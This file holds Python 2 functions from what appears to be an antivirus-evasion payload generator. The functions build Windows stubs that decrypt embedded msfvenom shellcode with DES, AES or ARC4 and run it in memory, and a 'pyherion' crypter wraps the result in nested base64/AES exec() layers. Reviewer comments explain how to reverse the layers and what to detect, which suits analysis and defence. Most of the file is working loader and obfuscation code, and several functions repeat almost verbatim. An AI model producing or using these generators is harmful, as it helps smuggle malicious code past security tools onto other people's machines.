def generate(self):
    """Return Python source for a Windows stub that decrypts and runs shellcode.

    The shellcode from self.shellcode.generate() is encrypted with DES in CFB
    mode. Key, IV and ciphertext are written into the returned source as
    string literals, followed by ctypes calls that copy the decrypted bytes
    into newly allocated memory and start a thread on them. When the
    "use_pyherion" option starts with "y", the source is passed through
    crypters.pyherion() before being returned.

    Python 2 only: relies on the "string_escape" codec and on str keys.
    """
    # Generate Shellcode Using msfvenom
    Shellcode = self.shellcode.generate()
    # Generate Random Variable Names
    # (identifiers used inside the generated stub; randomizer is a project
    # helper not shown here, so their length/alphabet is not visible)
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandIV = randomizer.randomString()
    RandDESKey = randomizer.randomString()
    RandDESPayload = randomizer.randomString()
    RandEncShellCodePayload = randomizer.randomString()
    # Set IV Value and DES Key
    # presumably 8 characters each, matching DES's 8-byte key and block size
    iv = randomizer.randomKey(8)
    DESKey = randomizer.randomKey(8)
    # Create DES Object and encrypt our payload
    desmain = DES.new(DESKey, DES.MODE_CFB, iv)
    EncShellCode = desmain.encrypt(Shellcode)
    # Create Payload File
    PayloadCode = 'from Crypto.Cipher import DES\n'
    PayloadCode += 'import ctypes\n'
    # NOTE(review): key and IV are emitted in cleartext beside the ciphertext,
    # so the encryption only hides the bytes from static signatures. Anyone
    # holding the stub can recover the shellcode by replaying this DES-CFB
    # decryption with the embedded values.
    PayloadCode += RandIV + ' = \'' + iv + '\'\n'
    PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
    PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
    # string_escape turns the raw ciphertext into a printable literal body
    PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
    # The stub decodes string_escape again after decrypting, so Shellcode is
    # presumably itself a "\x.."-escaped text string - TODO confirm against
    # shellcode.generate().
    PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    # NOTE(review): an RWX allocation followed by RtlMoveMemory and
    # CreateThread on the same address is a behavioural sequence that
    # endpoint monitoring can alert on; the API names also appear as plain
    # strings in the stub unless the pyherion wrapper below is applied.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # -1 is the INFINITE timeout: the stub blocks until the thread ends.
    # Unlike the lines above, this last line has no trailing newline.
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
    # Optional second layer: only the first character of the option value is
    # compared, case-insensitively.
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return Python source for a Windows stub that decrypts and runs shellcode.

    A new shellcode.Shellcode() object is created on every call and its
    output is encrypted with DES in CFB mode. The returned source embeds the
    key, IV and ciphertext as string literals and then uses ctypes to copy
    the decrypted bytes into newly allocated memory and run them in a
    thread. When the "use_pyherion" option starts with "y", the source is
    passed through crypters.pyherion() before being returned.

    Python 2 only: relies on the "string_escape" codec and on str keys.
    """
    # Generate Shellcode Using msfvenom
    # Replaces whatever self.shellcode held before this call.
    self.shellcode = shellcode.Shellcode()
    Shellcode = self.shellcode.generate()
    # Generate Random Variable Names
    # (identifiers for the generated stub; randomizer is defined elsewhere)
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandIV = randomizer.randomString()
    RandDESKey = randomizer.randomString()
    RandDESPayload = randomizer.randomString()
    RandEncShellCodePayload = randomizer.randomString()
    # Set IV Value and DES Key
    # presumably 8 characters each, as DES needs an 8-byte key and IV
    iv = randomizer.randomKey(8)
    DESKey = randomizer.randomKey(8)
    # Create DES Object and encrypt our payload
    desmain = DES.new(DESKey, DES.MODE_CFB, iv)
    EncShellCode = desmain.encrypt(Shellcode)
    # Create Payload File
    PayloadCode = 'from Crypto.Cipher import DES\n'
    PayloadCode += 'import ctypes\n'
    # NOTE(review): the decryption key and IV travel inside the stub in
    # cleartext, so this layer is obfuscation rather than confidentiality;
    # an analyst can decrypt the literal offline with the same three values.
    PayloadCode += RandIV + ' = \'' + iv + '\'\n'
    PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
    PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
    # string_escape makes the ciphertext safe to place in a quoted literal
    PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
    # Second string_escape decode happens after decryption, which suggests
    # Shellcode is a "\x.."-escaped text string - TODO confirm.
    PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    # NOTE(review): VirtualAlloc(RWX) -> RtlMoveMemory -> CreateThread ->
    # WaitForSingleObject issued from a Python interpreter is the runtime
    # behaviour to monitor for; variable names change per build, the API
    # sequence does not.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # -1 is the INFINITE timeout; this final line carries no trailing newline
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
    # Optional wrapper; only the option's first character is checked.
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def pyherion(code):
    """
    Generates a crypted hyperion'esque version of python code using
    base64 and AES with a random key, wrapped in an exec() dynamic launcher.

    code = the python source code to encrypt

    Returns the encrypted python code as a string: one line of ';'-joined
    import statements followed by a single exec() call.

    Lines of `code` that start with '#' are dropped. Every other line that
    contains the text "import" is kept in cleartext on the import line; the
    remaining lines are encrypted.
    """
    imports = list()
    codebase = list()
    # strip out all imports from the code so pyinstaller can properly
    # launch the code by preimporting everything at compiletime
    for line in code.split("\n"):
        # only comments starting at column 0 are recognised
        if not line.startswith("#"):  # ignore commented imports...
            # substring test: any line containing "import" anywhere is
            # treated as an import, not only real import statements
            if "import" in line:
                imports.append(line)
            else:
                codebase.append(line)
    # generate a random 256 AES key and build our AES cipher
    # NOTE(review): no mode is passed to AES.new(); PyCrypto falls back to
    # ECB in that case - confirm for the Crypto version in use.
    key = randomizer.randomKey(32)
    cipherEnc = AES.new(key)
    # encrypt the input file (less the imports)
    # encryption.EncodeAES is a project helper; judging by the b64decode and
    # rstrip('{') in the launcher it presumably pads with '{' and returns
    # base64 text - TODO confirm.
    encrypted = encryption.EncodeAES(cipherEnc, "\n".join(codebase))
    # some random variable names
    b64var = randomizer.randomString(5)
    aesvar = randomizer.randomString(5)
    # randomize our base64 and AES importing variable
    imports.append("from base64 import b64decode as %s" % (b64var))
    imports.append("from Crypto.Cipher import AES as %s" % (aesvar))
    # shuffle up our imports
    random.shuffle(imports)
    # add in the AES imports and any imports found in the file
    crypted = ";".join(imports) + "\n"
    # the exec() launcher for our base64'ed encrypted string
    # NOTE(review): the AES key is formatted into the inner launcher, so the
    # output is self-decrypting. Analysts can reverse it offline by
    # base64-decoding the exec() argument, reading the key literal and
    # decrypting the inner blob. The import aliases and key change per
    # build, but the shape (aliased b64decode/AES imports on one line, then
    # exec() of a long base64 literal) stays constant and can be matched
    # statically.
    crypted += "exec(%s(\"%s\"))" % (
        b64var,
        base64.b64encode(
            "exec(%s.new(\"%s\").decrypt(%s(\"%s\")).rstrip('{'))\n" %
            (aesvar, key, b64var, encrypted)))
    return crypted
def pyherion(code):
    """
    Generates a crypted hyperion'esque version of python code using
    base64 and AES with a random key, wrapped in an exec() dynamic launcher.

    code = the python source code to encrypt

    Returns the encrypted python code as a string. The first output line is
    the ';'-joined imports (left in cleartext), the second is an exec() of a
    base64 literal that in turn decrypts and exec()s the rest of `code`.
    """
    imports = list()
    codebase = list()
    # strip out all imports from the code so pyinstaller can properly
    # launch the code by preimporting everything at compiletime
    for line in code.split("\n"):
        # lines beginning with '#' land in neither list, i.e. are discarded
        if not line.startswith("#"):  # ignore commented imports...
            # matches the text "import" anywhere in the line
            if "import" in line:
                imports.append(line)
            else:
                codebase.append(line)
    # generate a random 256 AES key and build our AES cipher
    # NOTE(review): AES.new() is called without a mode; in PyCrypto that
    # means ECB - confirm against the installed Crypto package.
    key = randomizer.randomKey(32)
    cipherEnc = AES.new(key)
    # encrypt the input file (less the imports)
    # presumably returns base64 text padded with '{' (see the launcher's
    # b64decode and rstrip('{')) - verify in encryption.EncodeAES
    encrypted = encryption.EncodeAES(cipherEnc, "\n".join(codebase))
    # some random variable names
    b64var = randomizer.randomString(5)
    aesvar = randomizer.randomString(5)
    # randomize our base64 and AES importing variable
    imports.append("from base64 import b64decode as %s" %(b64var))
    imports.append("from Crypto.Cipher import AES as %s" %(aesvar))
    # shuffle up our imports
    random.shuffle(imports)
    # add in the AES imports and any imports found in the file
    crypted = ";".join(imports) + "\n"
    # the exec() launcher for our base64'ed encrypted string
    # NOTE(review): key and ciphertext ship together, so this is an encoding
    # layer, not a secret. For triage, decode the outer base64, take the key
    # from the AES .new("...") call and decrypt the inner literal. The nested
    # exec() plus the aliased base64/AES imports are the stable static traits
    # of the output.
    crypted += "exec(%s(\"%s\"))" % (b64var,base64.b64encode("exec(%s.new(\"%s\").decrypt(%s(\"%s\")).rstrip('{'))\n" %(aesvar,key,b64var,encrypted)))
    return crypted
def generate(self):
    """Return Python source for a Windows stub that AES-decrypts and runs shellcode.

    A new shellcode.Shellcode() object is created on every call. Its output
    is encrypted through encryption.EncodeAES with a random key, and the
    returned source embeds that key and the encoded ciphertext as string
    literals, followed by ctypes calls that copy the decrypted bytes into
    newly allocated memory and start a thread on them. When the
    "use_pyherion" option starts with "y", the source is passed through
    crypters.pyherion() before being returned.

    Python 2 only: the stub relies on the "string_escape" codec.
    """
    # Generate Shellcode Using msfvenom
    # Replaces whatever self.shellcode held before this call.
    self.shellcode = shellcode.Shellcode()
    Shellcode = self.shellcode.generate()
    # Generate Random Variable Names
    # ShellcodeVariableName is assigned but never used in this function.
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodeAES = randomizer.randomString()
    RandCipherObject = randomizer.randomString()
    RandDecodedShellcode = randomizer.randomString()
    RandShellCode = randomizer.randomString()
    RandPadding = randomizer.randomString()
    # Generate Random AES Key
    # key length is whatever randomizer.randomKey() defaults to (not shown)
    secret = randomizer.randomKey()
    # Create Cipher Object with Generated Secret Key
    # NOTE(review): no mode argument; PyCrypto uses ECB by default - confirm.
    cipher = AES.new(secret)
    EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
    # Create Payload code
    PayloadCode = 'import ctypes\n'
    PayloadCode += 'from Crypto.Cipher import AES\n'
    PayloadCode += 'import base64\n'
    # 'os' is imported by the stub but none of the lines emitted below use it
    PayloadCode += 'import os\n'
    # '{' is stripped after decryption, so it is presumably the padding
    # character EncodeAES appends - TODO confirm in encryption.EncodeAES
    PayloadCode += RandPadding + ' = \'{\'\n'
    PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
    # NOTE(review): the AES key is written into the stub in cleartext next to
    # the ciphertext; the layer defeats byte signatures on the shellcode but
    # is fully reversible by anyone holding the file.
    PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
    PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
    # string_escape decode implies the plaintext is "\x.."-escaped text
    PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    # NOTE(review): RWX allocation, RtlMoveMemory into it, then CreateThread
    # at that address is the behavioural sequence to detect at runtime.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # -1 is the INFINITE timeout: the stub blocks until the thread exits
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
    # Optional wrapper; only the option's first character is checked.
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return Python source for a Windows stub that AES-decrypts and runs shellcode.

    The shellcode from self.shellcode.generate() is encrypted through
    encryption.EncodeAES with a random key. The returned source embeds that
    key and the encoded ciphertext as string literals, then uses ctypes to
    copy the decrypted bytes into newly allocated memory and run them in a
    thread. When the "use_pyherion" option starts with "y", the source is
    passed through crypters.pyherion() before being returned.

    Python 2 only: the stub relies on the "string_escape" codec.
    """
    # Generate Shellcode Using msfvenom
    Shellcode = self.shellcode.generate()
    # Generate Random Variable Names
    # ShellcodeVariableName is assigned here but not referenced again.
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodeAES = randomizer.randomString()
    RandCipherObject = randomizer.randomString()
    RandDecodedShellcode = randomizer.randomString()
    RandShellCode = randomizer.randomString()
    RandPadding = randomizer.randomString()
    # Generate Random AES Key
    # randomKey() is called with its default length (helper not shown)
    secret = randomizer.randomKey()
    # Create Cipher Object with Generated Secret Key
    # NOTE(review): AES.new() without a mode means ECB in PyCrypto - confirm.
    cipher = AES.new(secret)
    EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
    # Create Payload code
    PayloadCode = 'import ctypes\n'
    PayloadCode += 'from Crypto.Cipher import AES\n'
    PayloadCode += 'import base64\n'
    # imported by the stub although no emitted line below references os
    PayloadCode += 'import os\n'
    # presumably the padding character used by EncodeAES - TODO confirm
    PayloadCode += RandPadding + ' = \'{\'\n'
    PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
    # NOTE(review): key and ciphertext are stored side by side in the stub,
    # so recovery of the shellcode for analysis needs nothing beyond the
    # file itself (base64-decode, AES-decrypt, strip '{').
    PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
    PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
    # the decrypted text is unescaped into raw bytes here
    PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    # NOTE(review): identifiers are randomised per build, but the
    # VirtualAlloc(RWX) / RtlMoveMemory / CreateThread call chain is fixed
    # and is what behavioural detection should key on.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # -1 is the INFINITE timeout
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
    # Optional wrapper; only the option's first character is checked.
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return Python source for a Windows stub that ARC4-decrypts and runs shellcode.

    The "inject_method" option selects one of two stub shapes:

    * value starting with "virtual": the stub allocates memory through
      kernel32.VirtualAlloc, copies the decrypted bytes in and starts a
      thread on them;
    * anything else: the stub places the decrypted bytes in a ctypes string
      buffer, casts it to a function pointer and calls it.

    In both shapes the ARC4 key and the ciphertext are embedded as string
    literals. When the "use_pyherion" option starts with "y", the source is
    passed through crypters.pyherion() before being returned.

    Python 2 only: relies on the "string_escape" codec and on str keys.
    """
    if self.required_options["inject_method"][0].lower() == "virtual":
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()
        # Generate Random Variable Names
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        ShellcodeVariableName = randomizer.randomString()
        RandIV = randomizer.randomString()
        RandARCKey = randomizer.randomString()
        RandARCPayload = randomizer.randomString()
        RandEncShellCodePayload = randomizer.randomString()
        # Set IV Value and ARC Key
        # The IV is emitted into the stub below but never given to ARC4.new(),
        # here or in the stub; it is a leftover assignment.
        iv = randomizer.randomKey(8)
        ARCKey = randomizer.randomKey(8)
        # Create ARC4 object and encrypt our payload
        arc4main = ARC4.new(ARCKey)
        EncShellCode = arc4main.encrypt(Shellcode)
        PayloadCode = 'from Crypto.Cipher import ARC4\n'
        PayloadCode += 'import ctypes\n'
        PayloadCode += RandIV + ' = \'' + iv + '\'\n'
        # NOTE(review): the key sits in cleartext beside the ciphertext, so
        # the shellcode can be recovered offline from the stub alone.
        PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
        PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
        # string_escape makes the ciphertext safe inside a quoted literal
        PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
        # second string_escape decode: plaintext is presumably "\x.."-escaped
        # text - TODO confirm against shellcode.generate()
        PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
        # NOTE(review): RWX allocation -> RtlMoveMemory -> CreateThread is
        # the fixed behavioural sequence to alert on for this branch.
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # -1 is the INFINITE timeout
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        # Optional wrapper; only the option's first character is checked.
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)
        return PayloadCode
    else:
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()
        # Generate Random Variable Names
        # RandPtr, RandBuf, RandHt and RandReverseShell are assigned but not
        # used anywhere in this branch.
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        ShellcodeVariableName = randomizer.randomString()
        RandIV = randomizer.randomString()
        RandARCKey = randomizer.randomString()
        RandARCPayload = randomizer.randomString()
        RandEncShellCodePayload = randomizer.randomString()
        RandShellcode = randomizer.randomString()
        RandReverseShell = randomizer.randomString()
        RandMemoryShell = randomizer.randomString()
        # Set IV Value and ARC Key
        # As above, the IV is written to the stub but ARC4 never receives it.
        iv = randomizer.randomKey(8)
        ARCKey = randomizer.randomKey(8)
        # Create ARC4 object and encrypt our payload
        arc4main = ARC4.new(ARCKey)
        EncShellCode = arc4main.encrypt(Shellcode)
        PayloadCode = 'from Crypto.Cipher import ARC4\n'
        # star import: the stub uses the bare ctypes names on the lines below
        PayloadCode += 'from ctypes import *\n'
        PayloadCode += RandIV + ' = \'' + iv + '\'\n'
        PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
        PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
        PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
        PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
        # NOTE(review): this branch makes no kernel32 calls, so detections
        # keyed only on the VirtualAlloc/CreateThread sequence do not cover
        # it. The static traits remain: an ARC4 import with a key literal
        # and a string buffer cast to CFUNCTYPE that is then called.
        PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
        PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
        # final stub line; emitted without a trailing newline
        PayloadCode += RandShellcode + '()'
        # Optional wrapper; only the option's first character is checked.
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)
        return PayloadCode
def generate(self):
    """Return Python source for a Windows stub that ARC4-decrypts and runs shellcode.

    If the "inject_method" option starts with "virtual", the stub uses
    kernel32 VirtualAlloc / RtlMoveMemory / CreateThread. Otherwise it
    copies the decrypted bytes into a ctypes string buffer, casts the buffer
    to a function pointer and calls it. Both stubs embed the ARC4 key and
    the ciphertext as string literals. When the "use_pyherion" option starts
    with "y", the source is passed through crypters.pyherion() before being
    returned.

    Python 2 only: relies on the "string_escape" codec and on str keys.
    """
    if self.required_options["inject_method"][0].lower() == "virtual":
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()
        # Generate Random Variable Names
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        ShellcodeVariableName = randomizer.randomString()
        RandIV = randomizer.randomString()
        RandARCKey = randomizer.randomString()
        RandARCPayload = randomizer.randomString()
        RandEncShellCodePayload = randomizer.randomString()
        # Set IV Value and ARC Key
        # ARC4.new() below takes only the key; the IV is emitted into the
        # stub as an unused literal.
        iv = randomizer.randomKey(8)
        ARCKey = randomizer.randomKey(8)
        # Create ARC4 object and encrypt our payload
        arc4main = ARC4.new(ARCKey)
        EncShellCode = arc4main.encrypt(Shellcode)
        PayloadCode = 'from Crypto.Cipher import ARC4\n'
        PayloadCode += 'import ctypes\n'
        PayloadCode += RandIV + ' = \'' + iv + '\'\n'
        # NOTE(review): cleartext key next to the ciphertext - this layer is
        # obfuscation only and is reversible from the stub alone.
        PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
        PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
        # string_escape makes the ciphertext safe inside a quoted literal
        PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
        # the plaintext is unescaped again after decryption, so Shellcode is
        # presumably "\x.."-escaped text - TODO confirm
        PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
        # NOTE(review): the names are random per build, but the
        # VirtualAlloc(RWX) / RtlMoveMemory / CreateThread chain is constant
        # and observable at runtime.
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # -1 is the INFINITE timeout
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        # Optional wrapper; only the option's first character is checked.
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)
        return PayloadCode
    else:
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()
        # Generate Random Variable Names
        # RandPtr, RandBuf, RandHt and RandReverseShell are never used in
        # this branch.
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        ShellcodeVariableName = randomizer.randomString()
        RandIV = randomizer.randomString()
        RandARCKey = randomizer.randomString()
        RandARCPayload = randomizer.randomString()
        RandEncShellCodePayload = randomizer.randomString()
        RandShellcode = randomizer.randomString()
        RandReverseShell = randomizer.randomString()
        RandMemoryShell = randomizer.randomString()
        # Set IV Value and ARC Key
        # the IV is again emitted but unused by ARC4
        iv = randomizer.randomKey(8)
        ARCKey = randomizer.randomKey(8)
        # Create ARC4 object and encrypt our payload
        arc4main = ARC4.new(ARCKey)
        EncShellCode = arc4main.encrypt(Shellcode)
        PayloadCode = 'from Crypto.Cipher import ARC4\n'
        # star import: the stub refers to ctypes names unqualified below
        PayloadCode += 'from ctypes import *\n'
        PayloadCode += RandIV + ' = \'' + iv + '\'\n'
        PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
        PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
        PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
        PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
        # NOTE(review): no kernel32 API calls are emitted here, so monitoring
        # that relies solely on the VirtualAlloc/CreateThread sequence misses
        # this shape. Coverage should also include the static pattern of a
        # ctypes buffer cast to CFUNCTYPE and invoked.
        PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
        PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
        # final stub line; emitted without a trailing newline
        PayloadCode += RandShellcode + '()'
        # Optional wrapper; only the option's first character is checked.
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)
        return PayloadCode